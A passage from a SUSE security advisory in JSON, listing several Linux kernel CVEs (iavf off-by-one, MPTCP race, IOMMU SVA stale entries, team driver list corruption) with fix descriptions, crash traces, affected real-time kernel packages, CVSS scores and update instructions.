"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-71086"
},
{
"cve": "CVE-2025-71087",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71087"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\niavf: fix off-by-one issues in iavf_config_rss_reg()\n\nThere are off-by-one bugs when configuring RSS hash key and lookup\ntable, causing out-of-bounds reads to memory [1] and out-of-bounds\nwrites to device registers.\n\nBefore commit 43a3d9ba34c9 (\"i40evf: Allow PF driver to configure RSS\"),\nthe loop upper bounds were:\n i \u003c= I40E_VFQF_{HKEY,HLUT}_MAX_INDEX\nwhich is safe since the value is the last valid index.\n\nThat commit changed the bounds to:\n i \u003c= adapter-\u003erss_{key,lut}_size / 4\nwhere `rss_{key,lut}_size / 4` is the number of dwords, so the last\nvalid index is `(rss_{key,lut}_size / 4) - 1`. Therefore, using `\u003c=`\naccesses one element past the end.\n\nFix the issues by using `\u003c` instead of `\u003c=`, ensuring we do not exceed\nthe bounds.\n\n[1] KASAN splat about rss_key_size off-by-one\n BUG: KASAN: slab-out-of-bounds in iavf_config_rss+0x619/0x800\n Read of size 4 at addr ffff888102c50134 by task kworker/u8:6/63\n\n CPU: 0 UID: 0 PID: 63 Comm: kworker/u8:6 Not tainted 6.18.0-rc2-enjuk-tnguy-00378-g3005f5b77652-dirty #156 PREEMPT(voluntary)\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2 04/01/2014\n Workqueue: iavf iavf_watchdog_task\n Call Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x6f/0xb0\n print_report+0x170/0x4f3\n kasan_report+0xe1/0x1a0\n iavf_config_rss+0x619/0x800\n iavf_watchdog_task+0x2be7/0x3230\n process_one_work+0x7fd/0x1420\n worker_thread+0x4d1/0xd40\n kthread+0x344/0x660\n ret_from_fork+0x249/0x320\n ret_from_fork_asm+0x1a/0x30\n \u003c/TASK\u003e\n\n Allocated by task 63:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_kmalloc+0x7f/0x90\n __kmalloc_noprof+0x246/0x6f0\n iavf_watchdog_task+0x28fc/0x3230\n process_one_work+0x7fd/0x1420\n worker_thread+0x4d1/0xd40\n kthread+0x344/0x660\n ret_from_fork+0x249/0x320\n ret_from_fork_asm+0x1a/0x30\n\n The buggy address belongs to the object at ffff888102c50100\n which belongs to the cache kmalloc-64 of size 64\n The buggy address is located 0 bytes to the right of\n allocated 52-byte region [ffff888102c50100, ffff888102c50134)\n\n The buggy address belongs to the physical page:\n page: refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x102c50\n flags: 0x200000000000000(node=0|zone=2)\n page_type: f5(slab)\n raw: 0200000000000000 ffff8881000418c0 dead000000000122 0000000000000000\n raw: 0000000000000000 0000000080200020 00000000f5000000 0000000000000000\n page dumped because: kasan: bad access detected\n\n Memory state around the buggy address:\n ffff888102c50000: 00 00 00 00 00 00 00 fc fc fc fc fc fc fc fc fc\n ffff888102c50080: 00 00 00 00 00 00 00 fc fc fc fc fc fc fc fc fc\n \u003effff888102c50100: 00 00 00 00 00 00 04 fc fc fc fc fc fc fc fc fc\n ^\n ffff888102c50180: 00 00 00 00 00 00 00 00 fc fc fc fc fc fc fc fc\n ffff888102c50200: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71087",
"url": "https://www.suse.com/security/cve/CVE-2025-71087"
},
{
"category": "external",
"summary": "SUSE Bug 1256628 for CVE-2025-71087",
"url": "https://bugzilla.suse.com/1256628"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-71087"
},
{
"cve": "CVE-2025-71088",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71088"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: fallback earlier on simult connection\n\nSyzkaller reports a simult-connect race leading to inconsistent fallback\nstatus:\n\n WARNING: CPU: 3 PID: 33 at net/mptcp/subflow.c:1515 subflow_data_ready+0x40b/0x7c0 net/mptcp/subflow.c:1515\n Modules linked in:\n CPU: 3 UID: 0 PID: 33 Comm: ksoftirqd/3 Not tainted syzkaller #0 PREEMPT(full)\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014\n RIP: 0010:subflow_data_ready+0x40b/0x7c0 net/mptcp/subflow.c:1515\n Code: 89 ee e8 78 61 3c f6 40 84 ed 75 21 e8 8e 66 3c f6 44 89 fe bf 07 00 00 00 e8 c1 61 3c f6 41 83 ff 07 74 09 e8 76 66 3c f6 90 \u003c0f\u003e 0b 90 e8 6d 66 3c f6 48 89 df e8 e5 ad ff ff 31 ff 89 c5 89 c6\n RSP: 0018:ffffc900006cf338 EFLAGS: 00010246\n RAX: 0000000000000000 RBX: ffff888031acd100 RCX: ffffffff8b7f2abf\n RDX: ffff88801e6ea440 RSI: ffffffff8b7f2aca RDI: 0000000000000005\n RBP: 0000000000000000 R08: 0000000000000005 R09: 0000000000000007\n R10: 0000000000000004 R11: 0000000000002c10 R12: ffff88802ba69900\n R13: 1ffff920000d9e67 R14: ffff888046f81800 R15: 0000000000000004\n FS: 0000000000000000(0000) GS:ffff8880d69bc000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 0000560fc0ca1670 CR3: 0000000032c3a000 CR4: 0000000000352ef0\n Call Trace:\n \u003cTASK\u003e\n tcp_data_queue+0x13b0/0x4f90 net/ipv4/tcp_input.c:5197\n tcp_rcv_state_process+0xfdf/0x4ec0 net/ipv4/tcp_input.c:6922\n tcp_v6_do_rcv+0x492/0x1740 net/ipv6/tcp_ipv6.c:1672\n tcp_v6_rcv+0x2976/0x41e0 net/ipv6/tcp_ipv6.c:1918\n ip6_protocol_deliver_rcu+0x188/0x1520 net/ipv6/ip6_input.c:438\n ip6_input_finish+0x1e4/0x4b0 net/ipv6/ip6_input.c:489\n NF_HOOK include/linux/netfilter.h:318 [inline]\n NF_HOOK include/linux/netfilter.h:312 [inline]\n ip6_input+0x105/0x2f0 net/ipv6/ip6_input.c:500\n dst_input include/net/dst.h:471 [inline]\n ip6_rcv_finish net/ipv6/ip6_input.c:79 [inline]\n NF_HOOK include/linux/netfilter.h:318 [inline]\n NF_HOOK include/linux/netfilter.h:312 [inline]\n ipv6_rcv+0x264/0x650 net/ipv6/ip6_input.c:311\n __netif_receive_skb_one_core+0x12d/0x1e0 net/core/dev.c:5979\n __netif_receive_skb+0x1d/0x160 net/core/dev.c:6092\n process_backlog+0x442/0x15e0 net/core/dev.c:6444\n __napi_poll.constprop.0+0xba/0x550 net/core/dev.c:7494\n napi_poll net/core/dev.c:7557 [inline]\n net_rx_action+0xa9f/0xfe0 net/core/dev.c:7684\n handle_softirqs+0x216/0x8e0 kernel/softirq.c:579\n run_ksoftirqd kernel/softirq.c:968 [inline]\n run_ksoftirqd+0x3a/0x60 kernel/softirq.c:960\n smpboot_thread_fn+0x3f7/0xae0 kernel/smpboot.c:160\n kthread+0x3c2/0x780 kernel/kthread.c:463\n ret_from_fork+0x5d7/0x6f0 arch/x86/kernel/process.c:148\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245\n \u003c/TASK\u003e\n\nThe TCP subflow can process the simult-connect syn-ack packet after\ntransitioning to TCP_FIN1 state, bypassing the MPTCP fallback check,\nas the sk_state_change() callback is not invoked for * -\u003e FIN_WAIT1\ntransitions.\n\nThat will move the msk socket to an inconsistent status and the next\nincoming data will hit the reported splat.\n\nClose the race moving the simult-fallback check at the earliest possible\nstage - that is at syn-ack generation time.\n\nAbout the fixes tags: [2] was supposed to also fix this issue introduced\nby [3]. [1] is required as a dependence: it was not explicitly marked as\na fix, but it is one and it has already been backported before [3]. In\nother words, this commit should be backported up to [3], including [2]\nand [1] if that\u0027s not already there.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71088",
"url": "https://www.suse.com/security/cve/CVE-2025-71088"
},
{
"category": "external",
"summary": "SUSE Bug 1256630 for CVE-2025-71088",
"url": "https://bugzilla.suse.com/1256630"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-71088"
},
{
"cve": "CVE-2025-71089",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71089"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\niommu: disable SVA when CONFIG_X86 is set\n\nPatch series \"Fix stale IOTLB entries for kernel address space\", v7.\n\nThis proposes a fix for a security vulnerability related to IOMMU Shared\nVirtual Addressing (SVA). In an SVA context, an IOMMU can cache kernel\npage table entries. When a kernel page table page is freed and\nreallocated for another purpose, the IOMMU might still hold stale,\nincorrect entries. This can be exploited to cause a use-after-free or\nwrite-after-free condition, potentially leading to privilege escalation or\ndata corruption.\n\nThis solution introduces a deferred freeing mechanism for kernel page\ntable pages, which provides a safe window to notify the IOMMU to\ninvalidate its caches before the page is reused.\n\n\nThis patch (of 8):\n\nIn the IOMMU Shared Virtual Addressing (SVA) context, the IOMMU hardware\nshares and walks the CPU\u0027s page tables. The x86 architecture maps the\nkernel\u0027s virtual address space into the upper portion of every process\u0027s\npage table. Consequently, in an SVA context, the IOMMU hardware can walk\nand cache kernel page table entries.\n\nThe Linux kernel currently lacks a notification mechanism for kernel page\ntable changes, specifically when page table pages are freed and reused. \nThe IOMMU driver is only notified of changes to user virtual address\nmappings. This can cause the IOMMU\u0027s internal caches to retain stale\nentries for kernel VA.\n\nUse-After-Free (UAF) and Write-After-Free (WAF) conditions arise when\nkernel page table pages are freed and later reallocated. The IOMMU could\nmisinterpret the new data as valid page table entries. The IOMMU might\nthen walk into attacker-controlled memory, leading to arbitrary physical\nmemory DMA access or privilege escalation. This is also a\nWrite-After-Free issue, as the IOMMU will potentially continue to write\nAccessed and Dirty bits to the freed memory while attempting to walk the\nstale page tables.\n\nCurrently, SVA contexts are unprivileged and cannot access kernel\nmappings. However, the IOMMU will still walk kernel-only page tables all\nthe way down to the leaf entries, where it realizes the mapping is for the\nkernel and errors out. This means the IOMMU still caches these\nintermediate page table entries, making the described vulnerability a real\nconcern.\n\nDisable SVA on x86 architecture until the IOMMU can receive notification\nto flush the paging cache before freeing the CPU kernel page table pages.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71089",
"url": "https://www.suse.com/security/cve/CVE-2025-71089"
},
{
"category": "external",
"summary": "SUSE Bug 1256612 for CVE-2025-71089",
"url": "https://bugzilla.suse.com/1256612"
},
{
"category": "external",
"summary": "SUSE Bug 1256615 for CVE-2025-71089",
"url": "https://bugzilla.suse.com/1256615"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "important"
}
],
"title": "CVE-2025-71089"
},
{
"cve": "CVE-2025-71091",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71091"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nteam: fix check for port enabled in team_queue_override_port_prio_changed()\n\nThere has been a syzkaller bug reported recently with the following\ntrace:\n\nlist_del corruption, ffff888058bea080-\u003eprev is LIST_POISON2 (dead000000000122)\n------------[ cut here ]------------\nkernel BUG at lib/list_debug.c:59!\nOops: invalid opcode: 0000 [#1] SMP KASAN NOPTI\nCPU: 3 UID: 0 PID: 21246 Comm: syz.0.2928 Not tainted syzkaller #0 PREEMPT(full)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014\nRIP: 0010:__list_del_entry_valid_or_report+0x13e/0x200 lib/list_debug.c:59\nCode: 48 c7 c7 e0 71 f0 8b e8 30 08 ef fc 90 0f 0b 48 89 ef e8 a5 02 55 fd 48 89 ea 48 89 de 48 c7 c7 40 72 f0 8b e8 13 08 ef fc 90 \u003c0f\u003e 0b 48 89 ef e8 88 02 55 fd 48 89 ea 48 b8 00 00 00 00 00 fc ff\nRSP: 0018:ffffc9000d49f370 EFLAGS: 00010286\nRAX: 000000000000004e RBX: ffff888058bea080 RCX: ffffc9002817d000\nRDX: 0000000000000000 RSI: ffffffff819becc6 RDI: 0000000000000005\nRBP: dead000000000122 R08: 0000000000000005 R09: 0000000000000000\nR10: 0000000080000000 R11: 0000000000000001 R12: ffff888039e9c230\nR13: ffff888058bea088 R14: ffff888058bea080 R15: ffff888055461480\nFS: 00007fbbcfe6f6c0(0000) GS:ffff8880d6d0a000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 000000110c3afcb0 CR3: 00000000382c7000 CR4: 0000000000352ef0\nCall Trace:\n \u003cTASK\u003e\n __list_del_entry_valid include/linux/list.h:132 [inline]\n __list_del_entry include/linux/list.h:223 [inline]\n list_del_rcu include/linux/rculist.h:178 [inline]\n __team_queue_override_port_del drivers/net/team/team_core.c:826 [inline]\n __team_queue_override_port_del drivers/net/team/team_core.c:821 [inline]\n team_queue_override_port_prio_changed drivers/net/team/team_core.c:883 [inline]\n team_priority_option_set+0x171/0x2f0 drivers/net/team/team_core.c:1534\n team_option_set drivers/net/team/team_core.c:376 [inline]\n team_nl_options_set_doit+0x8ae/0xe60 drivers/net/team/team_core.c:2653\n genl_family_rcv_msg_doit+0x209/0x2f0 net/netlink/genetlink.c:1115\n genl_family_rcv_msg net/netlink/genetlink.c:1195 [inline]\n genl_rcv_msg+0x55c/0x800 net/netlink/genetlink.c:1210\n netlink_rcv_skb+0x158/0x420 net/netlink/af_netlink.c:2552\n genl_rcv+0x28/0x40 net/netlink/genetlink.c:1219\n netlink_unicast_kernel net/netlink/af_netlink.c:1320 [inline]\n netlink_unicast+0x5aa/0x870 net/netlink/af_netlink.c:1346\n netlink_sendmsg+0x8c8/0xdd0 net/netlink/af_netlink.c:1896\n sock_sendmsg_nosec net/socket.c:727 [inline]\n __sock_sendmsg net/socket.c:742 [inline]\n ____sys_sendmsg+0xa98/0xc70 net/socket.c:2630\n ___sys_sendmsg+0x134/0x1d0 net/socket.c:2684\n __sys_sendmsg+0x16d/0x220 net/socket.c:2716\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xcd/0xfa0 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n\nThe problem is in this flow:\n1) Port is enabled, queue_id != 0, in qom_list\n2) Port gets disabled\n -\u003e team_port_disable()\n -\u003e team_queue_override_port_del()\n -\u003e del (removed from list)\n3) Port is disabled, queue_id != 0, not in any list\n4) Priority changes\n -\u003e team_queue_override_port_prio_changed()\n -\u003e checks: port disabled \u0026\u0026 queue_id != 0\n -\u003e calls del - hits the BUG as it is removed already\n\nTo fix this, change the check in team_queue_override_port_prio_changed()\nso it returns early if port is not enabled.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71091",
"url": "https://www.suse.com/security/cve/CVE-2025-71091"
},
{
"category": "external",
"summary": "SUSE Bug 1256773 for CVE-2025-71091",
"url": "https://bugzilla.suse.com/1256773"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
